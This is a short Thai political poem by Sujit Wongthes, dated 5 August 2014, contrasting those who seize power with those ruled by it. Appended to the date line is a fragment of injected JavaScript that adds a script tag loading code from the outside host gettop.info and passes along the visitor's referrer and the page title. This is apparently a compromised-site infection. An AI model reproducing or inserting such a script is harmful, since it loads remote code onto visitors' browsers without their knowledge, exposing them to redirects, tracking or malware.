คนละพวก

 

พวกหนึ่งเคียงขนาบข้างยึดอำนาจ

อีกพวกถูกอำนาจยึดคุมขนาน

โบราณว่าแพ้เป็นพระชนะเป็นมาร

ปัจจุบันว่าแพ้ขึ้นศาลชนะขึ้นสภา

 

สุจิตต์ วงษ์เทศ

อังคาร 5 สิงหาคม 2557d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;